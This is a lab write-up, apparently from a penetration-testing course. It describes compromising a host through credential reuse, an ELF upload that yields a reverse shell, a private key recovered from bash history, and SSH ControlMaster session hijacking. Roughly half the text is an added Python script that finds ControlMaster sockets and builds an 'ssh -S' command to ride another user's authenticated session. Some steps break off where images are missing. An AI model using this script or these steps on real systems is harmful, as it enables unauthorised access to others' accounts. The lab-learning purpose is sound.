Command: nmap -A -Pn 192.168.243.172
Nmap initial output
Nmap scan report for 192.168.243.172
Host is up (0.21s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5f:05:52:08:c6:45:b7:3b:9b:ae:f4:da:12:e0:2f:10 (RSA)
| 256 dd:e2:b9:d3:92:3e:ac:12:e2:a7:fd:36:75:d8:60:88 (ECDSA)
|_ 256 b0:0a:6f:c0:e8:71:8b:9a:91:c0:fc:7d:67:48:69:a5 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 4.X|5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
Aggressive OS guesses: Linux 4.15 - 5.6 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 205.19 ms 192.168.49.1
2 205.17 ms 192.168.243.172
Using the account credentials obtained from 192.168.243.171, log in at **http://192.168.243.173:8082/ui/login/**
After logging in, there is a page that looks like it accepts ELF file uploads:
It already contains a tpsreports.elf. Uploading the rev.elf generated in step one produces no reaction; renaming it to tpsreports.elf and uploading again (which suggests the upload handler only accepts that filename), then waiting a short while, yields a reverse shell:
Second flag obtained: 58736c6c295a9197ece6762369769108
ls -alh in the nottodd home directory shows a .bash_history; reading it turns up some interesting entries:
Save the contents of the recovered id_rsa private key (the saved file must be chmod 600, otherwise ssh refuses to use it):
Passwordless login from Kali with this key fails.
Look at the config file under .ssh; see the course book, p. 535, SSH Hijacking with ControlMaster.
Check the scheduled tasks: nottodd@cb2:/home/nottodd/.ssh$ crontab -l
Every five minutes, check whether a newly created file has appeared under /home/nottodd/.ssh/controlmaster:
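The polling step above is a manual loop; the script below is an added example (not code from the original writeup) that does the same thing and prints the `ssh -S` command that rides the already-authenticated master. The `SAMPLE_SSH_CONFIG` text, the `%r@%h:%p` ControlPath layout, the `ControlPersist` value and the socket name `todd@10.10.10.5:22` are constructed assumptions, since the page does not reproduce the real config or cron entry; on the target, point it at /home/nottodd/.ssh/controlmaster and the real ControlPath value instead.

```python
#!/usr/bin/env python3
"""Poll an OpenSSH ControlPath directory for a ControlMaster socket and build
the ssh command that reuses (hijacks) the already-authenticated session.

Added example for this writeup, not code from the original page. The ssh
config text and the socket name below are constructed assumptions.
"""
import os
import re
import socket
import stat
import tempfile
import time

# Constructed stand-in for the ~/.ssh/config inspected in the writeup (the page
# does not reproduce its contents). %r = remote user, %h = host, %p = port.
SAMPLE_SSH_CONFIG = """\
Host *
    ControlMaster auto
    ControlPath ~/.ssh/controlmaster/%r@%h:%p
    ControlPersist 10m
"""

# Regex fragments for the ControlPath tokens a target can be recovered from.
# Any other token (%C hash, %l, %u, ...) is matched but yields no target.
_TOKENS = {
    "r": r"(?P<user>[^@]+)",
    "h": r"(?P<host>.+)",
    "p": r"(?P<port>\d+)",
}


def parse_control_settings(config_text):
    """Return the Control* keywords of an ssh_config as a lowercase dict.
    Host blocks are flattened (last value wins), which is enough for a
    single 'Host *' stanza like the constructed one above."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key.startswith("control"):
            settings[key] = value
    return settings


def template_to_regex(path_template):
    """Turn the basename of a ControlPath template into a regex over socket names."""
    name = os.path.basename(path_template)
    out, i = [], 0
    while i < len(name):
        if name[i] == "%" and i + 1 < len(name):
            tok = name[i + 1]
            out.append("%" if tok == "%" else _TOKENS.get(tok, ".+"))
            i += 2
        else:
            out.append(re.escape(name[i]))
            i += 1
    return re.compile("^" + "".join(out) + "$")


def find_control_sockets(directory):
    """List unix-domain sockets in directory (the only entries ssh -S can use)."""
    try:
        names = sorted(os.listdir(directory))
    except OSError:
        return []
    found = []
    for name in names:
        path = os.path.join(directory, name)
        try:
            if stat.S_ISSOCK(os.stat(path).st_mode):
                found.append(path)
        except OSError:
            continue
    return found


def hijack_command(sock_path, path_template):
    """Build 'ssh -S <socket> [-p port] [user@]host' from the socket's name.
    Returns None when the name carries no host (e.g. a hashed %C path)."""
    m = template_to_regex(path_template).match(os.path.basename(sock_path))
    if not m:
        return None
    f = m.groupdict()
    if not f.get("host"):
        return None
    target = f"{f['user']}@{f['host']}" if f.get("user") else f["host"]
    port = f" -p {f['port']}" if f.get("port") else ""
    return f"ssh -S {sock_path}{port} {target}"


def wait_for_socket(directory, path_template, timeout=600, interval=5):
    """Poll until a usable ControlMaster socket appears; None on timeout."""
    deadline = time.monotonic() + timeout
    while True:
        for sock in find_control_sockets(directory):
            cmd = hijack_command(sock, path_template)
            if cmd:
                return cmd
        if time.monotonic() >= deadline:
            return None
        time.sleep(interval)


def make_demo_dir(name="todd@10.10.10.5:22"):
    """Create a temp dir holding a fake, unconnected unix socket named like a
    ControlMaster socket, so the loop can be exercised offline (constructed)."""
    directory = tempfile.mkdtemp(prefix="cm-demo-")
    path = os.path.join(directory, name)
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.bind(path)
    s.close()  # the socket file stays on disk until it is unlinked
    return directory, path


if __name__ == "__main__":
    cfg = parse_control_settings(SAMPLE_SSH_CONFIG)
    demo_dir, _ = make_demo_dir()
    print(wait_for_socket(demo_dir, cfg["controlpath"], timeout=5, interval=1))
```

The printed command works without a password or key because the master process that owns the socket already completed authentication as whoever the cron job runs as; `ssh -O check -S <socket> <host>` confirms the master is still alive before you try. If the ControlPath uses `%C` (a hash of the connection parameters), the socket name reveals nothing about the target and `hijack_command` returns None; in that case the destination has to come from the config or the cron command itself.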